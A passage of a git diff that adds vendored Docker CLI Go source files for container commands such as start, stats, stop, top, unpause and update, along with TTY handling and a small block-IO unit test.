+		// 4. Start the container.
+		if err := dockerCli.Client().ContainerStart(ctx, c.ID, startOptions); err != nil {
+			cancelFun()
+			<-cErr
+			if c.HostConfig.AutoRemove {
+				// wait container to be removed
+				<-statusChan
+			}
+			return err
+		}
+
+		// 5. Wait for attachment to break.
+		if c.Config.Tty && dockerCli.Out().IsTerminal() {
+			if err := MonitorTtySize(ctx, dockerCli, c.ID, false); err != nil {
+				fmt.Fprintf(dockerCli.Err(), "Error monitoring TTY size: %s\n", err)
+			}
+		}
+		if attchErr := <-cErr; attchErr != nil {
+			return attchErr
+		}
+
+		if status := <-statusChan; status != 0 {
+			return cli.StatusError{StatusCode: status}
+		}
+	} else if opts.checkpoint != "" {
+		if len(opts.containers) > 1 {
+			return fmt.Errorf("You cannot restore multiple containers at once.")
+		}
+		container := opts.containers[0]
+		startOptions := types.ContainerStartOptions{
+			CheckpointID:  opts.checkpoint,
+			CheckpointDir: opts.checkpointDir,
+		}
+		return dockerCli.Client().ContainerStart(ctx, container, startOptions)
+
+	} else {
+		// We're not going to attach to anything.
+		// Start as many containers as we want.
+		return startContainersWithoutAttachments(ctx, dockerCli, opts.containers)
+	}
+
+	return nil
+}
+
+func startContainersWithoutAttachments(ctx context.Context, dockerCli *command.DockerCli, containers []string) error {
+	var failedContainers []string
+	for _, container := range containers {
+		if err := dockerCli.Client().ContainerStart(ctx, container, types.ContainerStartOptions{}); err != nil {
+			fmt.Fprintf(dockerCli.Err(), "%s\n", err)
+			failedContainers = append(failedContainers, container)
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
+		}
+	}
+
+	if len(failedContainers) > 0 {
+		return fmt.Errorf("Error: failed to start containers: %v", strings.Join(failedContainers, ", "))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stats.go b/vendor/github.com/docker/docker/cli/command/container/stats.go
new file mode 100644
index 0000000000..12d5c68522
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/stats.go
@@ -0,0 +1,243 @@
+package container
+
+import (
+	"fmt"
+	"io"
+	"strings"
+	"sync"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/spf13/cobra"
+)
+
+type statsOptions struct {
+	all        bool
+	noStream   bool
+	format     string
+	containers []string
+}
+
+// NewStatsCommand creates a new cobra.Command for `docker stats`
+func NewStatsCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts statsOptions
+
+	cmd := &cobra.Command{
+		Use:   "stats [OPTIONS] [CONTAINER...]",
+		Short: "Display a live stream of container(s) resource usage statistics",
+		Args:  cli.RequiresMinArgs(0),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runStats(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.BoolVarP(&opts.all, "all", "a", false, "Show all containers (default shows just running)")
+	flags.BoolVar(&opts.noStream, "no-stream", false, "Disable streaming stats and only pull the first result")
+	flags.StringVar(&opts.format, "format", "", "Pretty-print images using a Go template")
+	return cmd
+}
+
+// runStats displays a live stream of resource usage statistics for one or more containers.
+// This shows real-time information on CPU usage, memory usage, and network I/O.
+func runStats(dockerCli *command.DockerCli, opts *statsOptions) error {
+	showAll := len(opts.containers) == 0
+	closeChan := make(chan error)
+
+	ctx := context.Background()
+
+	// monitorContainerEvents watches for container creation and removal (only
+	// used when calling `docker stats` without arguments).
+	monitorContainerEvents := func(started chan<- struct{}, c chan events.Message) {
+		f := filters.NewArgs()
+		f.Add("type", "container")
+		options := types.EventsOptions{
+			Filters: f,
+		}
+
+		eventq, errq := dockerCli.Client().Events(ctx, options)
+
+		// Whether we successfully subscribed to eventq or not, we can now
+		// unblock the main goroutine.
+		close(started)
+
+		for {
+			select {
+			case event := <-eventq:
+				c <- event
+			case err := <-errq:
+				closeChan <- err
+				return
+			}
+		}
+	}
+
+	// Get the daemonOSType if not set already
+	if daemonOSType == "" {
+		svctx := context.Background()
+		sv, err := dockerCli.Client().ServerVersion(svctx)
+		if err != nil {
+			return err
+		}
+		daemonOSType = sv.Os
+	}
+
+	// waitFirst is a WaitGroup to wait first stat data's reach for each container
+	waitFirst := &sync.WaitGroup{}
+
+	cStats := stats{}
+	// getContainerList simulates creation event for all previously existing
+	// containers (only used when calling `docker stats` without arguments).
+	getContainerList := func() {
+		options := types.ContainerListOptions{
+			All: opts.all,
+		}
+		cs, err := dockerCli.Client().ContainerList(ctx, options)
+		if err != nil {
+			closeChan <- err
+		}
+		for _, container := range cs {
+			s := formatter.NewContainerStats(container.ID[:12], daemonOSType)
+			if cStats.add(s) {
+				waitFirst.Add(1)
+				go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
+			}
+		}
+	}
+
+	if showAll {
+		// If no names were specified, start a long running goroutine which
+		// monitors container events. We make sure we're subscribed before
+		// retrieving the list of running containers to avoid a race where we
+		// would "miss" a creation.
+		started := make(chan struct{})
+		eh := command.InitEventHandler()
+		eh.Handle("create", func(e events.Message) {
+			if opts.all {
+				s := formatter.NewContainerStats(e.ID[:12], daemonOSType)
+				if cStats.add(s) {
+					waitFirst.Add(1)
+					go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
+				}
+			}
+		})
+
+		eh.Handle("start", func(e events.Message) {
+			s := formatter.NewContainerStats(e.ID[:12], daemonOSType)
+			if cStats.add(s) {
+				waitFirst.Add(1)
+				go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
+			}
+		})
+
+		eh.Handle("die", func(e events.Message) {
+			if !opts.all {
+				cStats.remove(e.ID[:12])
+			}
+		})
+
+		eventChan := make(chan events.Message)
+		go eh.Watch(eventChan)
+		go monitorContainerEvents(started, eventChan)
+		defer close(eventChan)
+		<-started
+
+		// Start a short-lived goroutine to retrieve the initial list of
+		// containers.
+		getContainerList()
+	} else {
+		// Artificially send creation events for the containers we were asked to
+		// monitor (same code path than we use when monitoring all containers).
+		for _, name := range opts.containers {
+			s := formatter.NewContainerStats(name, daemonOSType)
+			if cStats.add(s) {
+				waitFirst.Add(1)
+				go collect(ctx, s, dockerCli.Client(), !opts.noStream, waitFirst)
+			}
+		}
+
+		// We don't expect any asynchronous errors: closeChan can be closed.
+		close(closeChan)
+
+		// Do a quick pause to detect any error with the provided list of
+		// container names.
+		time.Sleep(1500 * time.Millisecond)
+		var errs []string
+		cStats.mu.Lock()
+		for _, c := range cStats.cs {
+			cErr := c.GetError()
+			if cErr != nil {
+				errs = append(errs, fmt.Sprintf("%s: %v", c.Name, cErr))
+			}
+		}
+		cStats.mu.Unlock()
+		if len(errs) > 0 {
+			return fmt.Errorf("%s", strings.Join(errs, ", "))
+		}
+	}
+
+	// before print to screen, make sure each container get at least one valid stat data
+	waitFirst.Wait()
+	format := opts.format
+	if len(format) == 0 {
+		if len(dockerCli.ConfigFile().StatsFormat) > 0 {
+			format = dockerCli.ConfigFile().StatsFormat
+		} else {
+			format = formatter.TableFormatKey
+		}
+	}
+	statsCtx := formatter.Context{
+		Output: dockerCli.Out(),
+		Format: formatter.NewStatsFormat(format, daemonOSType),
+	}
+	cleanScreen := func() {
+		if !opts.noStream {
+			fmt.Fprint(dockerCli.Out(), "\033[2J")
+			fmt.Fprint(dockerCli.Out(), "\033[H")
+		}
+	}
+
+	var err error
+	for range time.Tick(500 * time.Millisecond) {
+		cleanScreen()
+		ccstats := []formatter.StatsEntry{}
+		cStats.mu.Lock()
+		for _, c := range cStats.cs {
+			ccstats = append(ccstats, c.GetStatistics())
+		}
+		cStats.mu.Unlock()
+		if err = formatter.ContainerStatsWrite(statsCtx, ccstats); err != nil {
+			break
+		}
+		if len(cStats.cs) == 0 && !showAll {
+			break
+		}
+		if opts.noStream {
+			break
+		}
+		select {
+		case err, ok := <-closeChan:
+			if ok {
+				if err != nil {
+					// this is suppressing "unexpected EOF" in the cli when the
+					// daemon restarts so it shutdowns cleanly
+					if err == io.ErrUnexpectedEOF {
+						return nil
+					}
+					return err
+				}
+			}
+		default:
+			// just skip
+		}
+	}
+	return err
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go
new file mode 100644
index 0000000000..4b57e3fe05
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/stats_helpers.go
@@ -0,0 +1,226 @@
+package container
+
+import (
+	"encoding/json"
+	"errors"
+	"io"
+	"strings"
+	"sync"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli/command/formatter"
+	"github.com/docker/docker/client"
+	"golang.org/x/net/context"
+)
+
+type stats struct {
+	ostype string
+	mu     sync.Mutex
+	cs     []*formatter.ContainerStats
+}
+
+// daemonOSType is set once we have at least one stat for a container
+// from the daemon. It is used to ensure we print the right header based
+// on the daemon platform.
+var daemonOSType string
+
+func (s *stats) add(cs *formatter.ContainerStats) bool {
+	s.mu.Lock()
+	defer s.mu.Unlock()
+	if _, exists := s.isKnownContainer(cs.Container); !exists {
+		s.cs = append(s.cs, cs)
+		return true
+	}
+	return false
+}
+
+func (s *stats) remove(id string) {
+	s.mu.Lock()
+	if i, exists := s.isKnownContainer(id); exists {
+		s.cs = append(s.cs[:i], s.cs[i+1:]...)
+	}
+	s.mu.Unlock()
+}
+
+func (s *stats) isKnownContainer(cid string) (int, bool) {
+	for i, c := range s.cs {
+		if c.Container == cid {
+			return i, true
+		}
+	}
+	return -1, false
+}
+
+func collect(ctx context.Context, s *formatter.ContainerStats, cli client.APIClient, streamStats bool, waitFirst *sync.WaitGroup) {
+	logrus.Debugf("collecting stats for %s", s.Container)
+	var (
+		getFirst       bool
+		previousCPU    uint64
+		previousSystem uint64
+		u              = make(chan error, 1)
+	)
+
+	defer func() {
+		// if error happens and we get nothing of stats, release wait group whatever
+		if !getFirst {
+			getFirst = true
+			waitFirst.Done()
+		}
+	}()
+
+	response, err := cli.ContainerStats(ctx, s.Container, streamStats)
+	if err != nil {
+		s.SetError(err)
+		return
+	}
+	defer response.Body.Close()
+
+	dec := json.NewDecoder(response.Body)
+	go func() {
+		for {
+			var (
+				v                 *types.StatsJSON
+				memPercent        = 0.0
+				cpuPercent        = 0.0
+				blkRead, blkWrite uint64 // Only used on Linux
+				mem               = 0.0
+				memLimit          = 0.0
+				memPerc           = 0.0
+				pidsStatsCurrent  uint64
+			)
+
+			if err := dec.Decode(&v); err != nil {
+				dec = json.NewDecoder(io.MultiReader(dec.Buffered(), response.Body))
+				u <- err
+				if err == io.EOF {
+					break
+				}
+				time.Sleep(100 * time.Millisecond)
+				continue
+			}
+
+			daemonOSType = response.OSType
+
+			if daemonOSType != "windows" {
+				// MemoryStats.Limit will never be 0 unless the container is not running and we haven't
+				// got any data from cgroup
+				if v.MemoryStats.Limit != 0 {
+					memPercent = float64(v.MemoryStats.Usage) / float64(v.MemoryStats.Limit) * 100.0
+				}
+				previousCPU = v.PreCPUStats.CPUUsage.TotalUsage
+				previousSystem = v.PreCPUStats.SystemUsage
+				cpuPercent = calculateCPUPercentUnix(previousCPU, previousSystem, v)
+				blkRead, blkWrite = calculateBlockIO(v.BlkioStats)
+				mem = float64(v.MemoryStats.Usage)
+				memLimit = float64(v.MemoryStats.Limit)
+				memPerc = memPercent
+				pidsStatsCurrent = v.PidsStats.Current
+			} else {
+				cpuPercent = calculateCPUPercentWindows(v)
+				blkRead = v.StorageStats.ReadSizeBytes
+				blkWrite = v.StorageStats.WriteSizeBytes
+				mem = float64(v.MemoryStats.PrivateWorkingSet)
+			}
+			netRx, netTx := calculateNetwork(v.Networks)
+			s.SetStatistics(formatter.StatsEntry{
+				Name:             v.Name,
+				ID:               v.ID,
+				CPUPercentage:    cpuPercent,
+				Memory:           mem,
+				MemoryPercentage: memPerc,
+				MemoryLimit:      memLimit,
+				NetworkRx:        netRx,
+				NetworkTx:        netTx,
+				BlockRead:        float64(blkRead),
+				BlockWrite:       float64(blkWrite),
+				PidsCurrent:      pidsStatsCurrent,
+			})
+			u <- nil
+			if !streamStats {
+				return
+			}
+		}
+	}()
+	for {
+		select {
+		case <-time.After(2 * time.Second):
+			// zero out the values if we have not received an update within
+			// the specified duration.
+			s.SetErrorAndReset(errors.New("timeout waiting for stats"))
+			// if this is the first stat you get, release WaitGroup
+			if !getFirst {
+				getFirst = true
+				waitFirst.Done()
+			}
+		case err := <-u:
+			if err != nil {
+				s.SetError(err)
+				continue
+			}
+			s.SetError(nil)
+			// if this is the first stat you get, release WaitGroup
+			if !getFirst {
+				getFirst = true
+				waitFirst.Done()
+			}
+		}
+		if !streamStats {
+			return
+		}
+	}
+}
+
+func calculateCPUPercentUnix(previousCPU, previousSystem uint64, v *types.StatsJSON) float64 {
+	var (
+		cpuPercent = 0.0
+		// calculate the change for the cpu usage of the container in between readings
+		cpuDelta = float64(v.CPUStats.CPUUsage.TotalUsage) - float64(previousCPU)
+		// calculate the change for the entire system between readings
+		systemDelta = float64(v.CPUStats.SystemUsage) - float64(previousSystem)
+	)
+
+	if systemDelta > 0.0 && cpuDelta > 0.0 {
+		cpuPercent = (cpuDelta / systemDelta) * float64(len(v.CPUStats.CPUUsage.PercpuUsage)) * 100.0
+	}
+	return cpuPercent
+}
+
+func calculateCPUPercentWindows(v *types.StatsJSON) float64 {
+	// Max number of 100ns intervals between the previous time read and now
+	possIntervals := uint64(v.Read.Sub(v.PreRead).Nanoseconds()) // Start with number of ns intervals
+	possIntervals /= 100                                         // Convert to number of 100ns intervals
+	possIntervals *= uint64(v.NumProcs)                          // Multiple by the number of processors
+
+	// Intervals used
+	intervalsUsed := v.CPUStats.CPUUsage.TotalUsage - v.PreCPUStats.CPUUsage.TotalUsage
+
+	// Percentage avoiding divide-by-zero
+	if possIntervals > 0 {
+		return float64(intervalsUsed) / float64(possIntervals) * 100.0
+	}
+	return 0.00
+}
+
+func calculateBlockIO(blkio types.BlkioStats) (blkRead uint64, blkWrite uint64) {
+	for _, bioEntry := range blkio.IoServiceBytesRecursive {
+		switch strings.ToLower(bioEntry.Op) {
+		case "read":
+			blkRead = blkRead + bioEntry.Value
+		case "write":
+			blkWrite = blkWrite + bioEntry.Value
+		}
+	}
+	return
+}
+
+func calculateNetwork(network map[string]types.NetworkStats) (float64, float64) {
+	var rx, tx float64
+
+	for _, v := range network {
+		rx += float64(v.RxBytes)
+		tx += float64(v.TxBytes)
+	}
+	return rx, tx
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go
new file mode 100644
index 0000000000..828d634c8a
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/stats_unit_test.go
@@ -0,0 +1,20 @@
+package container
+
+import (
+	"testing"
+
+	"github.com/docker/docker/api/types"
+)
+
+func TestCalculateBlockIO(t *testing.T) {
+	blkio := types.BlkioStats{
+		IoServiceBytesRecursive: []types.BlkioStatEntry{{8, 0, "read", 1234}, {8, 1, "read", 4567}, {8, 0, "write", 123}, {8, 1, "write", 456}},
+	}
+	blkRead, blkWrite := calculateBlockIO(blkio)
+	if blkRead != 5801 {
+		t.Fatalf("blkRead = %d, want 5801", blkRead)
+	}
+	if blkWrite != 579 {
+		t.Fatalf("blkWrite = %d, want 579", blkWrite)
+	}
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/stop.go b/vendor/github.com/docker/docker/cli/command/container/stop.go
new file mode 100644
index 0000000000..c68ede5368
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/stop.go
@@ -0,0 +1,67 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+	"time"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type stopOptions struct {
+	time        int
+	timeChanged bool
+
+	containers []string
+}
+
+// NewStopCommand creates a new cobra.Command for `docker stop`
+func NewStopCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts stopOptions
+
+	cmd := &cobra.Command{
+		Use:   "stop [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Stop one or more running containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			opts.timeChanged = cmd.Flags().Changed("time")
+			return runStop(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.IntVarP(&opts.time, "time", "t", 10, "Seconds to wait for stop before killing it")
+	return cmd
+}
+
+func runStop(dockerCli *command.DockerCli, opts *stopOptions) error {
+	ctx := context.Background()
+
+	var timeout *time.Duration
+	if opts.timeChanged {
+		timeoutValue := time.Duration(opts.time) * time.Second
+		timeout = &timeoutValue
+	}
+
+	var errs []string
+
+	errChan := parallelOperation(ctx, opts.containers, func(ctx context.Context, id string) error {
+		return dockerCli.Client().ContainerStop(ctx, id, timeout)
+	})
+	for _, container := range opts.containers {
+		if err := <-errChan; err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/top.go b/vendor/github.com/docker/docker/cli/command/container/top.go
new file mode 100644
index 0000000000..160153ba7f
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/top.go
@@ -0,0 +1,58 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+	"text/tabwriter"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type topOptions struct {
+	container string
+
+	args []string
+}
+
+// NewTopCommand creates a new cobra.Command for `docker top`
+func NewTopCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts topOptions
+
+	cmd := &cobra.Command{
+		Use:   "top CONTAINER [ps OPTIONS]",
+		Short: "Display the running processes of a container",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.container = args[0]
+			opts.args = args[1:]
+			return runTop(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.SetInterspersed(false)
+
+	return cmd
+}
+
+func runTop(dockerCli *command.DockerCli, opts *topOptions) error {
+	ctx := context.Background()
+
+	procList, err := dockerCli.Client().ContainerTop(ctx, opts.container, opts.args)
+	if err != nil {
+		return err
+	}
+
+	w := tabwriter.NewWriter(dockerCli.Out(), 20, 1, 3, ' ', 0)
+	fmt.Fprintln(w, strings.Join(procList.Titles, "\t"))
+
+	for _, proc := range procList.Processes {
+		fmt.Fprintln(w, strings.Join(proc, "\t"))
+	}
+	w.Flush()
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/tty.go b/vendor/github.com/docker/docker/cli/command/container/tty.go
new file mode 100644
index 0000000000..6af8e2becf
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/tty.go
@@ -0,0 +1,103 @@
+package container
+
+import (
+	"fmt"
+	"os"
+	gosignal "os/signal"
+	"runtime"
+	"time"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/cli/command"
+	"github.com/docker/docker/client"
+	"github.com/docker/docker/pkg/signal"
+	"golang.org/x/net/context"
+)
+
+// resizeTtyTo resizes tty to specific height and width
+func resizeTtyTo(ctx context.Context, client client.ContainerAPIClient, id string, height, width uint, isExec bool) {
+	if height == 0 && width == 0 {
+		return
+	}
+
+	options := types.ResizeOptions{
+		Height: height,
+		Width:  width,
+	}
+
+	var err error
+	if isExec {
+		err = client.ContainerExecResize(ctx, id, options)
+	} else {
+		err = client.ContainerResize(ctx, id, options)
+	}
+
+	if err != nil {
+		logrus.Debugf("Error resize: %s", err)
+	}
+}
+
+// MonitorTtySize updates the container tty size when the terminal tty changes size
+func MonitorTtySize(ctx context.Context, cli *command.DockerCli, id string, isExec bool) error {
+	resizeTty := func() {
+		height, width := cli.Out().GetTtySize()
+		resizeTtyTo(ctx, cli.Client(), id, height, width, isExec)
+	}
+
+	resizeTty()
+
+	if runtime.GOOS == "windows" {
+		go func() {
+			prevH, prevW := cli.Out().GetTtySize()
+			for {
+				time.Sleep(time.Millisecond * 250)
+				h, w := cli.Out().GetTtySize()
+
+				if prevW != w || prevH != h {
+					resizeTty()
+				}
+				prevH = h
+				prevW = w
+			}
+		}()
+	} else {
+		sigchan := make(chan os.Signal, 1)
+		gosignal.Notify(sigchan, signal.SIGWINCH)
+		go func() {
+			for range sigchan {
+				resizeTty()
+			}
+		}()
+	}
+	return nil
+}
+
+// ForwardAllSignals forwards signals to the container
+func ForwardAllSignals(ctx context.Context, cli *command.DockerCli, cid string) chan os.Signal {
+	sigc := make(chan os.Signal, 128)
+	signal.CatchAll(sigc)
+	go func() {
+		for s := range sigc {
+			if s == signal.SIGCHLD || s == signal.SIGPIPE {
+				continue
+			}
+			var sig string
+			for sigStr, sigN := range signal.SignalMap {
+				if sigN == s {
+					sig = sigStr
+					break
+				}
+			}
+			if sig == "" {
+				fmt.Fprintf(cli.Err(), "Unsupported signal: %v. Discarding.\n", s)
+				continue
+			}
+
+			if err := cli.Client().ContainerKill(ctx, cid, sig); err != nil {
+				logrus.Debugf("Error sending signal: %s", err)
+			}
+		}
+	}()
+	return sigc
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/unpause.go b/vendor/github.com/docker/docker/cli/command/container/unpause.go
new file mode 100644
index 0000000000..c4d8d4841e
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/unpause.go
@@ -0,0 +1,50 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	"github.com/spf13/cobra"
+)
+
+type unpauseOptions struct {
+	containers []string
+}
+
+// NewUnpauseCommand creates a new cobra.Command for `docker unpause`
+func NewUnpauseCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts unpauseOptions
+
+	cmd := &cobra.Command{
+		Use:   "unpause CONTAINER [CONTAINER...]",
+		Short: "Unpause all processes within one or more containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			return runUnpause(dockerCli, &opts)
+		},
+	}
+	return cmd
+}
+
+func runUnpause(dockerCli *command.DockerCli, opts *unpauseOptions) error {
+	ctx := context.Background()
+
+	var errs []string
+	errChan := parallelOperation(ctx, opts.containers, dockerCli.Client().ContainerUnpause)
+	for _, container := range opts.containers {
+		if err := <-errChan; err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
+		}
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/update.go b/vendor/github.com/docker/docker/cli/command/container/update.go
new file mode 100644
index 0000000000..75765856c5
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/update.go
@@ -0,0 +1,163 @@
+package container
+
+import (
+	"fmt"
+	"strings"
+
+	"golang.org/x/net/context"
+
+	containertypes "github.com/docker/docker/api/types/container"
+	"github.com/docker/docker/cli"
+	"github.com/docker/docker/cli/command"
+	runconfigopts "github.com/docker/docker/runconfig/opts"
+	"github.com/docker/go-units"
+	"github.com/spf13/cobra"
+)
+
+type updateOptions struct {
+	blkioWeight        uint16
+	cpuPeriod          int64
+	cpuQuota           int64
+	cpuRealtimePeriod  int64
+	cpuRealtimeRuntime int64
+	cpusetCpus         string
+	cpusetMems         string
+	cpuShares          int64
+	memoryString       string
+	memoryReservation  string
+	memorySwap         string
+	kernelMemory       string
+	restartPolicy      string
+
+	nFlag int
+
+	containers []string
+}
+
+// NewUpdateCommand creates a new cobra.Command for `docker update`
+func NewUpdateCommand(dockerCli *command.DockerCli) *cobra.Command {
+	var opts updateOptions
+
+	cmd := &cobra.Command{
+		Use:   "update [OPTIONS] CONTAINER [CONTAINER...]",
+		Short: "Update configuration of one or more containers",
+		Args:  cli.RequiresMinArgs(1),
+		RunE: func(cmd *cobra.Command, args []string) error {
+			opts.containers = args
+			opts.nFlag = cmd.Flags().NFlag()
+			return runUpdate(dockerCli, &opts)
+		},
+	}
+
+	flags := cmd.Flags()
+	flags.Uint16Var(&opts.blkioWeight, "blkio-weight", 0, "Block IO (relative weight), between 10 and 1000, or 0 to disable (default 0)")
+	flags.Int64Var(&opts.cpuPeriod, "cpu-period", 0, "Limit CPU CFS (Completely Fair Scheduler) period")
+	flags.Int64Var(&opts.cpuQuota, "cpu-quota", 0, "Limit CPU CFS (Completely Fair Scheduler) quota")
+	flags.Int64Var(&opts.cpuRealtimePeriod, "cpu-rt-period", 0, "Limit the CPU real-time period in microseconds")
+	flags.Int64Var(&opts.cpuRealtimeRuntime, "cpu-rt-runtime", 0, "Limit the CPU real-time runtime in microseconds")
+	flags.StringVar(&opts.cpusetCpus, "cpuset-cpus", "", "CPUs in which to allow execution (0-3, 0,1)")
+	flags.StringVar(&opts.cpusetMems, "cpuset-mems", "", "MEMs in which to allow execution (0-3, 0,1)")
+	flags.Int64VarP(&opts.cpuShares, "cpu-shares", "c", 0, "CPU shares (relative weight)")
+	flags.StringVarP(&opts.memoryString, "memory", "m", "", "Memory limit")
+	flags.StringVar(&opts.memoryReservation, "memory-reservation", "", "Memory soft limit")
+	flags.StringVar(&opts.memorySwap, "memory-swap", "", "Swap limit equal to memory plus swap: '-1' to enable unlimited swap")
+	flags.StringVar(&opts.kernelMemory, "kernel-memory", "", "Kernel memory limit")
+	flags.StringVar(&opts.restartPolicy, "restart", "", "Restart policy to apply when a container exits")
+
+	return cmd
+}
+
+func runUpdate(dockerCli *command.DockerCli, opts *updateOptions) error {
+	var err error
+
+	if opts.nFlag == 0 {
+		return fmt.Errorf("You must provide one or more flags when using this command.")
+	}
+
+	var memory int64
+	if opts.memoryString != "" {
+		memory, err = units.RAMInBytes(opts.memoryString)
+		if err != nil {
+			return err
+		}
+	}
+
+	var memoryReservation int64
+	if opts.memoryReservation != "" {
+		memoryReservation, err = units.RAMInBytes(opts.memoryReservation)
+		if err != nil {
+			return err
+		}
+	}
+
+	var memorySwap int64
+	if opts.memorySwap != "" {
+		if opts.memorySwap == "-1" {
+			memorySwap = -1
+		} else {
+			memorySwap, err = units.RAMInBytes(opts.memorySwap)
+			if err != nil {
+				return err
+			}
+		}
+	}
+
+	var kernelMemory int64
+	if opts.kernelMemory != "" {
+		kernelMemory, err = units.RAMInBytes(opts.kernelMemory)
+		if err != nil {
+			return err
+		}
+	}
+
+	var restartPolicy containertypes.RestartPolicy
+	if opts.restartPolicy != "" {
+		restartPolicy, err = runconfigopts.ParseRestartPolicy(opts.restartPolicy)
+		if err != nil {
+			return err
+		}
+	}
+
+	resources := containertypes.Resources{
+		BlkioWeight:        opts.blkioWeight,
+		CpusetCpus:         opts.cpusetCpus,
+		CpusetMems:         opts.cpusetMems,
+		CPUShares:          opts.cpuShares,
+		Memory:             memory,
+		MemoryReservation:  memoryReservation,
+		MemorySwap:         memorySwap,
+		KernelMemory:       kernelMemory,
+		CPUPeriod:          opts.cpuPeriod,
+		CPUQuota:           opts.cpuQuota,
+		CPURealtimePeriod:  opts.cpuRealtimePeriod,
+		CPURealtimeRuntime: opts.cpuRealtimeRuntime,
+	}
+
+	updateConfig := containertypes.UpdateConfig{
+		Resources:     resources,
+		RestartPolicy: restartPolicy,
+	}
+
+	ctx := context.Background()
+
+	var (
+		warns []string
+		errs  []string
+	)
+	for _, container := range opts.containers {
+		r, err := dockerCli.Client().ContainerUpdate(ctx, container, updateConfig)
+		if err != nil {
+			errs = append(errs, err.Error())
+		} else {
+			fmt.Fprintf(dockerCli.Out(), "%s\n", container)
+		}
+		warns = append(warns, r.Warnings...)
+	}
+	if len(warns) > 0 {
+		fmt.Fprintf(dockerCli.Out(), "%s", strings.Join(warns, "\n"))
+	}
+	if len(errs) > 0 {
+		return fmt.Errorf("%s", strings.Join(errs, "\n"))
+	}
+	return nil
+}
diff --git a/vendor/github.com/docker/docker/cli/command/container/utils.go b/vendor/github.com/docker/docker/cli/command/container/utils.go
new file mode 100644
index 0000000000..6bef92463c
--- /dev/null
+++ b/vendor/github.com/docker/docker/cli/command/container/utils.go
@@ -0,0 +1,143 @@
+package container
+
+import (
+	"strconv"
+
+	"golang.org/x/net/context"
+
+	"github.com/Sirupsen/logrus"
+	"github.com/docker/docker/api/types"
+	"github.com/docker/docker/api/types/events"
+	"github.com/docker/docker/api/types/filters"
+	"github.com/docker/docker/api/types/versions"
+	"github.com/docker/docker/cli/command"
+	clientapi "github.com/docker/docker/client"
+)
+
+func waitExitOrRemoved(ctx context.Context, dockerCli *command.DockerCli, containerID string, waitRemove bool) chan int {
+	if len(containerID) == 0 {
+		// containerID can never be empty
+		panic("Internal Error: waitExitOrRemoved needs a containerID as parameter")
+	}
+
+	var removeErr error
+	statusChan := make(chan int)
+	exitCode := 125
+
+	// Get events via Events API
+	f := filters.NewArgs()
+	f.Add("type", "container")
+	f.Add("container", containerID)
+	options := types.EventsOptions{
+		Filters: f,
+	}
+	eventCtx, cancel := context.WithCancel(ctx)
+	eventq, errq := dockerCli.Client().Events(eventCtx, options)
+
+	eventProcessor := func(e events.Message) bool {
+		stopProcessing := false
+		switch e.Status {
+		case "die":
+			if v, ok := e.Actor.Attributes["exitCode"]; ok {
